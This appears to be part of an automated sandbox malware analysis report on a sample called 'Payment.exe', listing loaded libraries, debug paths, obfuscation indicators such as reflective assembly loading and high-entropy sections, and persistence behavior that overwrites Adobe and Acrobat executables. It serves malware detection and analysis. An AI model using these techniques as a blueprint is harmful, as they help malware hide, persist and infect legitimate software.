                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                  Source: C:\Users\user\Desktop\Payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Payment.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Payment.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: Payment.exeStatic file information: File size 1285120 > 1048576
                  Source: Payment.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x139200
                  Source: Payment.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Payment.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vssvc.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, Payment.exe, 00000008.00000002.2146723496.0000000003898000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001212000.00000004.00000020.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.8.dr
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdbOGP source: ie_to_edge_stub.exe.8.dr
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcVJ.pdb source: Payment.exe
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb source: javacpl.exe.8.dr
                  Source: Binary string: locator.pdb source: Locator.exe.8.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb# source: AdobeCollabSync.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: elevation_service.exe, 00000011.00000003.1805106051.0000000000730000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000011.00000003.1805057918.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\javacplexec\obj\javacpl.pdb774 source: javacpl.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\ie_to_edge_stub.exe.pdb source: ie_to_edge_stub.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000011.00000003.1846801591.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: elevation_service.exe, 00000011.00000003.1809550980.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: elevation_service.exe, 00000011.00000003.1808047986.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: elevation_service.exe, 00000011.00000003.1851271062.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: elevation_service.exe, 00000011.00000003.1850530432.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: elevation_service.exe, 00000011.00000003.1852312433.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: elevation_service.exe, 00000011.00000003.1847561680.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ifsutil.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: elevation_service.exe, 00000011.00000003.1853173657.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: elevation_service.exe, 00000011.00000003.1848948951.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: notification_helper.exe.pdb source: notification_helper.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: elevation_service.exe, 00000011.00000003.1844334067.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: elevation_service.exe, 00000011.00000003.1795189498.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: udfs.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.8.dr
                  Source: Binary string: uudf.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\pack200_objs\pack200.pdb source: elevation_service.exe, 00000011.00000003.1849948590.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: elevation_service.exe, 00000011.00000003.1851754548.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vcVJ.pdbSHA256& source: Payment.exe
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: elevation_service.exe, 00000011.00000003.1763004881.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdbGCTL source: Locator.exe.8.dr
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: elevation_service.exe, 00000011.00000003.1848431203.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: elevation_service.exe, 00000011.00000003.1847956635.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: elevation_service.exe, 00000011.00000003.1849458502.0000000000730000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: default-browser-agent.pdb source: default-browser-agent.exe.8.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AdobeCollabSync.pdb source: AdobeCollabSync.exe.8.dr
                  Source: Binary string: vssapi.pdb source: WBEngine.0.etl.34.dr
                  Source: Binary string: spp.pdb source: WBEngine.0.etl.34.dr

                  Data Obfuscation

                  barindex
                  Source: 0.2.Payment.exe.5570000.2.raw.unpack, dTuvtD1DdyQbwj9dR3.cs.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
                  Source: Payment.exeStatic PE information: 0xCF582113 [Tue Mar 26 06:15:47 2080 UTC]
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00402000 LoadLibraryA,GetProcAddress,LdrInitializeThunk,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_00402000
                  Source: pingsender.exe.8.drStatic PE information: section name: .00cfg
                  Source: pingsender.exe.8.drStatic PE information: section name: .voltbl
                  Source: plugin-container.exe.8.drStatic PE information: section name: .00cfg
                  Source: plugin-container.exe.8.drStatic PE information: section name: .voltbl
                  Source: private_browsing.exe.8.drStatic PE information: section name: .00cfg
                  Source: private_browsing.exe.8.drStatic PE information: section name: .voltbl
                  Source: updater.exe.8.drStatic PE information: section name: .00cfg
                  Source: updater.exe.8.drStatic PE information: section name: .voltbl
                  Source: updater.exe.8.drStatic PE information: section name: _RDATA
                  Source: armsvc.exe.8.drStatic PE information: section name: .didat
                  Source: alg.exe.8.drStatic PE information: section name: .didat
                  Source: FXSSVC.exe.8.drStatic PE information: section name: .didat
                  Source: elevation_service.exe.8.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.8.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.8.drStatic PE information: section name: _RDATA
                  Source: updater.exe0.8.drStatic PE information: section name: CPADinfo
                  Source: updater.exe0.8.drStatic PE information: section name: malloc_h
                  Source: elevation_service.exe0.8.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe0.8.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe0.8.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe0.8.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe0.8.drStatic PE information: section name: malloc_h
                  Source: maintenanceservice.exe.8.drStatic PE information: section name: .00cfg
                  Source: maintenanceservice.exe.8.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe.8.drStatic PE information: section name: _RDATA
                  Source: msdtc.exe.8.drStatic PE information: section name: .didat
                  Source: msiexec.exe.8.drStatic PE information: section name: .didat
                  Source: MsSense.exe.8.drStatic PE information: section name: .didat
                  Source: unpack200.exe.8.drStatic PE information: section name: .00cfg
                  Source: Spectrum.exe.8.drStatic PE information: section name: .didat
                  Source: TieringEngineService.exe.8.drStatic PE information: section name: .didat
                  Source: vds.exe.8.drStatic PE information: section name: .didat
                  Source: VSSVC.exe.8.drStatic PE information: section name: .didat
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052EDD75 push ebp; ret 0_2_052EDD81
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052EDDA6 push ebp; ret 0_2_052EDDAD
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052EDD8A push ebp; ret 0_2_052EDD91
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052EDD82 push ebp; ret 0_2_052EDD89
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052EDD9A push ebp; ret 0_2_052EDDA1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_052EDD92 push ebp; ret 0_2_052EDD99
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0041C40C push cs; iretd 8_2_0041C4E2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_00423149 push eax; ret 8_2_00423179
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0041C50E push cs; iretd 8_2_0041C4E2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_004231C8 push eax; ret 8_2_00423179
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0040E21D push ecx; ret 8_2_0040E230
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0041C6BE push ebx; ret 8_2_0041C6BF
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4E2F8 push 02E4DB41h; ret 8_2_02E4DBED
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4E2F8 push 02E4E473h; ret 8_2_02E4E0FF
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4E2F8 push 02E4E2EDh; ret 8_2_02E4E124
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4E2F8 push 02E4DDBBh; ret 8_2_02E4E13E
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4E2F8 push 02E4E2FBh; ret 8_2_02E4E243
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4E2F8 push 02E4DE5Fh; ret 8_2_02E4E364
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4A2B8 push 02E48728h; ret 8_2_02E48533
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4A2B8 push 02E4897Bh; ret 8_2_02E48968
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4A2B8 push 02E49B4Dh; ret 8_2_02E49AF8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4A2B8 push 02E4A2E5h; ret 8_2_02E4A32D
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4A2B8 push 02E49DE0h; ret 8_2_02E4A4F6
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E4A2B8 push 02E4A57Ah; ret 8_2_02E4A675
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 push 02E45E00h; ret 8_2_02E45ECE
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 push 02E46053h; ret 8_2_02E460F0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 push 02E462CAh; ret 8_2_02E461A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 push 02E4635Fh; ret 8_2_02E461B2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 push 02E46334h; ret 8_2_02E461E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 push 02E4642Dh; ret 8_2_02E46305
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_02E48286 push 02E46463h; ret 8_2_02E46349
                  Source: Payment.exeStatic PE information: section name: .text entropy: 7.903766851207894
                  Source: jwBqGZseW.exe.0.drStatic PE information: section name: .text entropy: 7.903766851207894
                  Source: Aut2exe.exe.8.drStatic PE information: section name: .rsrc entropy: 7.800302950828862
                  Source: Aut2exe_x64.exe.8.drStatic PE information: section name: .rsrc entropy: 7.800429394459221
                  Source: AppVClient.exe.8.drStatic PE information: section name: .reloc entropy: 7.94301908113562
                  Source: AutoIt3_x64.exe.8.drStatic PE information: section name: .reloc entropy: 7.950956486853016
                  Source: SciTE.exe.8.drStatic PE information: section name: .reloc entropy: 7.91811475723973
                  Source: jucheck.exe.8.drStatic PE information: section name: .reloc entropy: 7.937399784672375
                  Source: jusched.exe.8.drStatic PE information: section name: .reloc entropy: 7.9425167056531905
                  Source: FXSSVC.exe.8.drStatic PE information: section name: .reloc entropy: 7.949298739388325
                  Source: elevation_service.exe.8.drStatic PE information: section name: .reloc entropy: 7.952031475381403
                  Source: updater.exe0.8.drStatic PE information: section name: .reloc entropy: 7.884386899159848
                  Source: elevation_service.exe0.8.drStatic PE information: section name: .reloc entropy: 7.952892988390758
                  Source: SensorDataService.exe.8.drStatic PE information: section name: .reloc entropy: 7.942019523886895
                  Source: Spectrum.exe.8.drStatic PE information: section name: .reloc entropy: 7.95233156787885
                  Source: AgentService.exe.8.drStatic PE information: section name: .reloc entropy: 7.943788461553357
                  Source: vds.exe.8.drStatic PE information: section name: .reloc entropy: 7.948062658447608
                  Source: VSSVC.exe.8.drStatic PE information: section name: .reloc entropy: 7.946510544249622
                  Source: wbengine.exe.8.drStatic PE information: section name: .reloc entropy: 7.94826362750618
                  Source: 0.2.Payment.exe.5570000.2.raw.unpack, P3eh8af2o4VTkSD0Y3.csHigh entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
                  Source: 0.2.Payment.exe.5570000.2.raw.unpack, dTuvtD1DdyQbwj9dR3.csHigh entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
                  Source: 0.2.Payment.exe.5570000.2.raw.unpack, ihTFxFFnSRQetgx2gS.csHigh entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\89ead7124fd5c239.bin
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Users\user\Desktop\Payment.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
